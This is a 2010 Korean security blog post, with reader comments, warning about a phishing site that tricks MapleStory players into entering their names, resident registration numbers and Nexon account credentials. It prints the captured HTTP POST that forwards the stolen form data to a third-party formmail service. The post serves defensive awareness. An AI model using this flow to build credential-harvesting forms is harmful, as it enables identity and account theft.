본문 바로가기

벌새::Analysis

메이플스토리 & 넥슨 계정 정보 탈취용 국내 피싱 사이트 주의 (2010.5.2)

반응형
넥슨(Nexon)에서 제공하는 온라인 게임 메이플스토리(MapleStory) 상에서 불법적인 방법으로 이득을 볼 수 있다고 사용자를 속여 특정 사이트로 유도하여 개인정보 및 메이플스토리를 비롯한 넥슨 계정 정보를 탈취하는 피싱(Phishing) 사이트가 발견되었으므로 주의하시기 바랍니다.
해당 피싱 사이트 도메인은 넥슨 도메인과 유사한 이름으로 구성되어 있으며, 접속시 블루웹 폼메일을 통해 사용자 이름, 주민등록번호, 메이플 계정 정보, 넥슨 계정 정보를 입력하도록 유도하고 있습니다.
해당 양식에 정보를 입력하면 주민등록번호의 유효성을 체크한 후 정확하게 입력된 경우 그림과 같은 확인창이 생성되는 것을 확인할 수 있습니다.
확인 버튼을 클릭하면 자동으로 넥슨 사이트로 이동을 시켜서 실제 원하는 불법적인 동작이 성공한 것처럼 사용자를 속이고 있습니다.

하지만 알려진 바에 따르면 입력한 정보를 바탕으로 계정 접속을 방해하고 피해를 유발할 수 있으므로 매우 주의하시기 바랍니다.
실제 해당 양식에 정보를 입력할 경우에 블루웹 폼에 입력된 특정 ID로 해당 정보가 전송되는 것을 확인할 수 있습니다.

[양식 입력 정보 전송값]

POST /formmail/send.php?dataname=(전송 받는 ID : cksdud****) HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://db.blueweb.co.kr/formmail/formmail.html?dataname=cksdud****
Accept-Language: ko

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: db.blueweb.co.kr
Content-Length: 391
Connection: Keep-Alive
Cache-Control: no-cache

user_name=(입력한 이름)&user_jumin1=(주민등록번호 앞자리)&user_jumin2=(주민등록번호 뒷자리)&user_email=(전송 받는 ID : cksdud****)&user_text(생략)
HTTP/1.1 200 OK
Date: Sat, 01 May 2010 15:45:58 GMT
Server: Apache/1.3.39 (Unix) mod_gzip/1.3.19.1a PHP/5.1.6 mod_ssl/2.8.30 OpenSSL/0.9.7a
X-Powered-By: PHP/5.1.6
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

이렇게 수집된 온라인 게임 계정 정보를 바탕으로 아이템 탈취를 비롯한 불법 행위 및 수집된 개인정보를 통해 타 인터넷 서비스에도 적용이 가능하므로 사용자는 외부 서비스 또는 프로그램에 계정 정보를 입력하는 일이 없도록 주의하시기 바랍니다.

참고로 해당 피싱에 정보를 입력한 사용자는 동일한 비밀번호를 사용하는 타 인터넷 사이트 계정 정보를 반드시 수정하시기 바라며, 앞으로 입력된 주민등록번호를 바탕으로 악의적인 행위가 있을 수 있으므로 주의가 요구됩니다.
728x90
반응형
  • 저런걸 만든 사람들도 문제지만, '불법적인 이득' 을 얻겠다고 바보같이 개인정보를 입력하는 사람들도 있다는게 문제지요 -_-;;

    • 게임에 몰입된 사람들 중에는 분명히 저런 류의 무언가가 있다는 확신에 의해 자연스럽게 호기심이 발동되리라 생각됩니다.

  • 불필요한 호기심이나 뭔가 이득을 노리면 역시 부메랑으로 되돌아온다는 교훈을 느끼게 해주겠군요..
    요즘 낚는 방법이 기발한 것 같습니다. ㅎㅎ

  • 상상돌이 2010.05.03 08:57 댓글주소 수정/삭제 댓글쓰기

    역시 아주 교묘하네요.
    저도 예전에 저런거에 당해 본적이 있었죠.

  • 아이들이라면 걸려들기 쉽도록 되어 있네요 ㅇㅅㅇ
    저렇게하고 싶을까요... 쩝

  • 알 수 없는 사용자 2010.05.05 01:49 댓글주소 수정/삭제 댓글쓰기

    아직 코묻은 아이들이 가장 많이 걸릴텐데 다큰 사람이 많은 어린이들의 사이버머니를 갈취해가는게 괘씸하네요...

    • 이게 재미있는게 일부 온라인 게임하는 아이들 중에는 부모의 개인정보를 이용하는 애들이 있고 결국 부모의 개인정보가 유출될 소지가 있죠.

    • 알 수 없는 사용자 2010.05.05 02:22 댓글주소 수정/삭제

      사실... 폼메일이 약 4~5년 전쯤에도 있었던것 같았는데 그때는 제가 폼메일이 뭔지도 모르는 코묻은 애라서 부모님의 주민등록번호를 기재했던것 같기도 하고 아닌것 같기도 하고 아니... 잘 생각해보면 번호를 약간 다르게 썻던것 같네요.